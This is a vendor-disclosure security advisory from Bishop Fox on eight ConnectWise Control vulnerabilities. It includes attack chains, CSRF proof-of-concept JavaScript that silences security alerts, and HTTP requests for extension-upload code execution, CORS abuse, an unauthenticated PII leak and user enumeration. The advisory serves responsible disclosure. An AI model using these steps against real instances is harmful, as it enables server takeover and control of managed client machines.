ConnectWise Control 19.3.25270.7185 - Eight Vulnerabilities, Including Critical

Introduction

Bishop Fox takes security seriously. In accordance with our Vulnerability Disclosure Policy, we follow the industry-standard responsible disclosure process. At the expiration of this time window, we disclose discovered vulnerabilities in our Security Bulletins and Advisories.

Read the technical details below to see if you’re affected.

One of our security researchers, Matt Hamilton (a Bishop Fox alumnus) discovered several vulnerabilities while conducting research on the ConnectWise Control product, an application that allows remote administration of endpoints. As a part of our disclosure process, Bishop Fox proactively reached out to the vendor ConnectWise to help them understand the technical nature of the discovered vulnerabilities. During the research process, we read in news reports that ConnectWise products had been exploited in a ransomware attack in Texas. Without knowing whether the attack was facilitated by the vulnerabilities we discovered, Bishop Fox separately reached out to the Federal Bureau of Investigation and the local Texas field office to provide details on the discovered vulnerabilities in case this information could be of use to the investigation into the ransomware incident.

Chaining the vulnerabilities as described below would allow an attacker to execute arbitrary code on a victim’s Control server, as well as gain control of any client machines connected to a victim’s Control instance. What we discovered is consistent with the issues reported on by both CRN and ZDNet—however, this is not proof that the vulnerabilities we discovered were used in the incident. What we can say is that nothing we have read about the Texas ransomware attack so far rules out the possibility that these vulnerabilities were involved.

For example, Bishop Fox determined that multi-factor authentication (MFA) provides no mitigation for any of the vulnerabilities that we discovered. This is consistent with a reported statement by Rick Myers, the owner of the firm that provides MSP services to the affected sites, that “he is not sure if MFA would have made a difference in this case.” In the same article, CRN also reported:

Myers said he believes the attacks are being carried out on "several different levels" with an as-yet unidentified "issue" that is key to the Texas ransomware attack.

If true, this statement would suggest that the attackers used an attack chain involving multiple vulnerabilities, beyond an unsophisticated brute-force attack. Furthermore, with a code execution vulnerability present, it would be possible for a sophisticated attacker to cover their tracks, which makes attribution extremely difficult.

In a follow-up meeting with the vendor on September 25, 2019, ConnectWise CISO John Ford asserted that the Bishop Fox findings did not affect on-premise solutions and stated that these vulnerabilities are not exploitable because ConnectWise was unable to reproduce them using the steps that Bishop Fox provided them. Additionally, Mr. Ford raised the threat of a defamation lawsuit. But Bishop Fox’s research found vulnerabilities that do, in fact, impact on-premise installations.

Bishop Fox stands by our security researchers and believes in a fair and transparent process. In this particular case, we extended the disclosure timeline to give ConnectWise additional time to address these issues. ConnectWise has released multiple updates to the product since the initial discovery; however, the only vulnerability that appears to be addressed was the user enumeration vulnerability, and the release notes make no mention of the other security issues identified.

Read the Huntress Labs Blog: Validating the Bishop Fox Findings in ConnectWise Control at https://blog.huntresslabs.com/validating-the-bishop-fox-findings-in-connectwise-control-9155eec36a34

References

• https://www.zdnet.com/article/connectwise-warns-of-ongoing-ransomware-attacks-targeting-its-customers/
• https://www.crn.com/news/security/connectwise-tool-used-as-entry-point-in-texas-ransomware-attack
  
• https://www.crn.com/news/channel-programs/msp-at-center-of-texas-ransomware-hit-we-take-care-of-our-customers-
  
• https://docs.connectwise.com/ConnectWise_Control_Documentation/Release_notes
• https://www.channelfutures.com/mssp-insider/cybersecurity-roundup-msp-survives-ransomware-attack-via-connectwise-kaseya-tools

Advisory Summary

The following describes identified vulnerabilities in the ConnectWise control , formerly known as ScreenConnect, version 19.3.25270.7185.

Using the vulnerabilities documented in this disclosure, it was possible to create an attack chain that begins with coercing a SaaS user to visit an attacker-controlled website and ends with the complete takeover of the victim's ConnectWise Control instance. This includes the ability to execute arbitrary code on the Control server as well as the ability to connect to any client machine connected to the victim's Control instance.*Earlier versions are untested at the time of writing, but presumed to be vulnerable.

*Earlier versions are untested at the time of writing, but presumed to be vulnerable.

Product Description

ConnectWise Control is a remote desktop utility. The project’s official website is https://connectwise.com/software/control. The latest version of the application at the time of this research is version 19.3.25270.7185, released on September 3, 2019.

Vulnerabilities List

Eight vulnerabilities were identified within the ConnectWise Control application:

• CROSS-SITE REQUEST FORGERY (CSRF)
  
• CROSS-SITE SCRIPTING (XSS)
• CROSS-ORIGIN RESOURCE SHARING (CORS) MISCONFIGURATION
• REMOTE CODE EXECUTION
• INFORMATION DISCLOSURE
• USER ENUMERATION
• MISSING SECURITY HEADERS
• INSECURE COOKIE SCOPE

Solution

Notify vendor.

Timeline

1. Initial discovery: 09/13/2019
2. Vulnerabilities submitted to MITRE for CVE number assignment: 9/18/2019
3. Initial email contact with vendor (Frank DePrisco, Director, Identify & Data Security Operations, John Ford, CISO) with full disclosure; no response: 9/18/2019
4. Multiple CVE's assigned: CVE-2019-16512, CVE-2019-16513, CVE-2019-16514, CVE-2019-16515, CVE-2019-16516, CVE-2019-16517 (CVE does not cover SaaS or cloud issues at this time): 9/19/2019
5. Bishop Fox engaged vendor support chat to open a security ticket: 9/19/2019
6. Vendor response for follow-up call: 9/19/2019
7. Phone conference with vendor: 9/20/2019
8. Bishop Fox reply to vendor: 9/23/2019
9. Vendor follow-up meeting: 9/25/2019
10. Vulnerability disclosed publicly: 1/22/2020

Credits

Matt Hamilton, Senior Security Analyst, Alumnus of Bishop Fox

Attack Chains

Code Execution on Control Server

Using the vulnerabilities disclosed in this document, it is possible for an attacker to execute arbitrary code on a victim's Control server using the steps outlined below:

1. An attacker can create a JavaScript payload that exploits the lack of CSRF protection to upload an extension containing malicious code to the visitor’s instance if the visitor is an administrator.
2. An attacker can load JavaScript into the victim's browser by coercing the victim to visit an attacker-controlled site or a SaaS instance under the attacker's control, exploiting the XSS vulnerability.
3. Once the payload is executed in the victim's browser, the attacker can use the uploaded extension to execute arbitrary code on the victim's Control instance.
4. An attacker able to arbitrary execute code on a SaaS Control server may have the ability to access any resources accessible to the instance itself such as S3 buckets, EC2 instances, or other sensitive resources within the cloud environment that are accessible to the compromised server.

Connection to Any Client's Desktop

It is possible for an attacker to gain control of any client machines connected to a victim's Control instance using the steps below:

1. An attacker can create a JavaScript payload that exploits the lack of CSRF protection, sending requests to endpoints on the visitor’s Control instance to collect the information necessary to build a client. This information includes a target client's session identifiers, Control instance public key, and signed tokens for the target identifiers.
2. An attacker could load the malicious JavaScript into the victim's browser by coercing the victim to visit an attacker-controlled site or a SaaS instance under the attacker's control, exploiting the XSS vulnerability.
3. Once the JavaScript is executed, it can exploit the lack of CSRF protection and CORS misconfiguration to gather information necessary and then construct a client connection.
4. Optionally, the attacker could use Control functionality to silently execute code on the target client(s).

VULNERABILITIES

Cross-site Request Forgery (CSRF)

The ConnectWise Control cloud and user instances do not implement CSRF protection. If a user visited a third-party website while authenticated to the Control application, script running on the malicious website would be able modify a user's Control account by sending API requests, without the knowledge of the victim Control user.

Neither the Control cloud service nor customer instance APIs include CSRF-prevention tokens. This is a crucial security control that, if implemented, would prevent JavaScript on other domains from sending mutable-data API requests on behalf of victim users.
The proof-of-concept JavaScript code below disables "suspicious account activity" email alerts. This attack is not mitigated due to the lack of CSRF prevention:

//
// Disable "suspicious account activity" emails
//
var request = new XMLHttpRequest();
request.withCredentials = true;
request.open('POST', 'https://cloud.screenconnect.co...');
request.setRequestHeader('Content-Type', 'application/json');
request.send('[false, false, false, false]');
request.onload = function() {
console.log(this.response);
}

FIGURE 1 - Proof-of-concept JavaScript code to disable "suspicious account activity" email notifications

This issue impacts both the ConnectWise Control cloud server and customer Control servers.

Cross-site Scripting (XSS)

The ConnectWise Control application is affected by a stored cross-site scripting vulnerability in the Appearance modifier. The vulnerability allowed any malicious customer to execute arbitrary JavaScript in visitors’ browsers.

Stored XSS was present in the Appearance modifier that allowed an administrator of a given Control instance to add arbitrary HTML to the login page, enabling the administrator to conduct an XSS attack on any users who visit the login page, as shown below:

Once this payload is added, anyone who visits the login page will execute the attacker-controlled JavaScript payload.
Only the LoginPanel.LoginReason.None.Message field was tested for XSS, as it was one of the few fields accessible on an unauthenticated page. It is likely there are other fields that are equally vulnerable.

Cross-Origin Resource Sharing (CORS) Misconfiguration

Both the ConnectWise Control cloud and customer instances were affected by a CORS misconfiguration, which reflected the Origin provided by incoming requests. This allowed JavaScript running on any domain to interact with both the Control cloud and customer Control server APIs and perform administrative actions, such as signing session identifiers, without the victim’s knowledge.

Requests sent using JavaScript on arbitrary websites to ConnectWise Control are explicitly allowed to read the response content, as the Origin header is improperly reflected in the Access-Control-Allow-Origin response header, as shown below:

Request

POST /Service/GetProfileInfo HTTP/1.1
Host: cloud.screenconnect.com
Origin: https://bishopfox.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Control Server
Access-Control-Allow-Origin: https://bishopfox.com

This issue impacts both the ConnectWise Control cloud server and customer instances.

This vulnerability enables any site, regardless of the origin, to send requests to the Control API and read the resulting response.

Remote Code Execution

The ConnectWise Control server is vulnerable to a remote code execution vulnerability. Administrative users could upload unsigned extension ZIP file containing executable code that is subsequently executed by the server.

Administrative users can upload extensions as Base64-encoded ZIP files, as shown below:

Request

POST /Services/ExtensionService.ashx/InstallExtension HTTP/1.1
Host: bishopfox.screenconnect.com
Content-Type: application/json
Content-Length: 1904
Origin: https://bishopfox.screenconnect.com
Connection: close
Cookie: CloudAuth=ug[REDACTED]A

[“UEsDBA…omitted for brevity…AAA==”]

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 38
Content-Type: application/json; charset=utf-8
Access-Control-Allow-Origin: https://bishopfox.screenconnect.com
Access-Control-Allow-Credentials: true
Connection: close

“7f322b7b-d86c-4bc2-a6a6-111111111111"

When an extension is uploaded, even if the contents are not signed, they are accessible using forced browsing and can be executed on the server. An attacker could navigate to the URL below, and the ArbitraryCode.ashx file in the extension's ZIP would be executed by the server despite not being signed:

https://bishopfox.screenconnect.com/App_Extensions/7f322b7b-d86c-4bc2-a6a6-111111111111</span>/ArbitraryCode.ashx

FIGURE 4 - Uploaded extension executes arbitrary code when accessed directly

An attacker able to arbitrary execute code on a SaaS Control server may have the ability to access any resources accessible to the instance itself such as S3 buckets, EC2 instances, or other sensitive resources within the cloud environment that are accessible to the compromised server.

Information Disclosure

The ConnectWise Control cloud service is affected by an information disclosure vulnerability that allows an unauthenticated attacker to reveal the administrator email address and postal code of an arbitrary customer Control instance.

The  /scripts/Service/GetScripts endpoint on cloud.screenconnect.com returns the personally identifiable information (PII) of the owner when an InstanceID is posted to the unauthenticated API, as shown below:

Request

POST /scripts/Service/GetScripts HTTP/1.1
Host: cloud.screenconnect.com
Content-Type: application/json
Content-Length: 25
Connection: close

[{“InstanceID":"a1q2qz"}]

Response

…omitted for brevity…
“codeContext":{"accountId":"urnce4","accountAttributes":248,"remainingEvaluationDays":11.0000,"accountCreationDate":"\/Date(1568488200000)\/","emailAddress":"[email protected]","country":"United States”,"postalCode":"94111","state":null,"orgType":"Other","instanceId":"a1q2qz","instanceAttributes":0,"currentLicenseType":"EVALUATION_ACCESS_PLUS-1903","currentLicenseCount":3,"regionId":"us4"}}]

This vulnerability is present only on the ConnectWise Control cloud server and does not affect self-hosted instances.

Due to the low entropy of the InstanceID value, it is also possible for an attacker to brute-force these values, resulting in a list of email addresses and postal codes of all ConnectWise Control SaaS customers.

User Enumeration

ConnectWise Control is vulnerable to a user enumeration vulnerability, allowing an unauthenticated attacker to determine with certainty if an account exists for a given username.

When logging in, the authentication service's verbose X-Login-Result header responds explicitly if the user does not exist. When a user attempts to log in as an account that does not exist, a UserNameInvalid header value is returned:

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 79247
Content-Type: text/html; charset=utf-8
P3P: CP="NON CUR OUR STP STA PRE"
X-Login-Result: UserNameInvalid

FIGURE 5 - Response to login request from nonexistent user

When a user attempts to log in as an account that does exist, but with an incorrect password, the PasswordInvalid header value is returned.

HTTP/1.1 200 OK
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 97237
Content-Type: text/html; charset=utf-8
P3P: CP="NON CUR OUR STP STA PRE"
X-Login-Result: PasswordInvalid

FIGURE 6 - Response of login request from existing user

By brute-forcing usernames and inspecting the response, an attacker can create a list of target accounts that are known to exist.

Missing Security Headers

The ConnectWise Control application does not implement modern HTTP security headers, which is a missed opportunity to implement optional security features in browsers.

The following security headers are not implemented in the Control application:

• Strict-Transport-Security (HSTS)
• Content-Security-Policy (CSP)

This issue impacts both the ConnectWise Control cloud server and customer instances.

Insecure Cookie Scope

The ConnectWise Control authentication cookie, CloudAuth, is scoped to the parent domain,  screenconnect.com. When a user visits a Control instance owned by a malicious SaaS customer, the user's CloudAuth token would be sent to the malicious user's SaaS instance.

Sending the CloudAuth token to all screenconnect.com subdomains may be viewed as an acceptable risk, as all machines running under that domain are operated by ConnectWise. However, in the event that a malicious SaaS user gains code execution (like the one documented in this disclosure) or is otherwise able to read the content of incoming requests, the malicious user could take over the sessions of other visiting SaaS customers.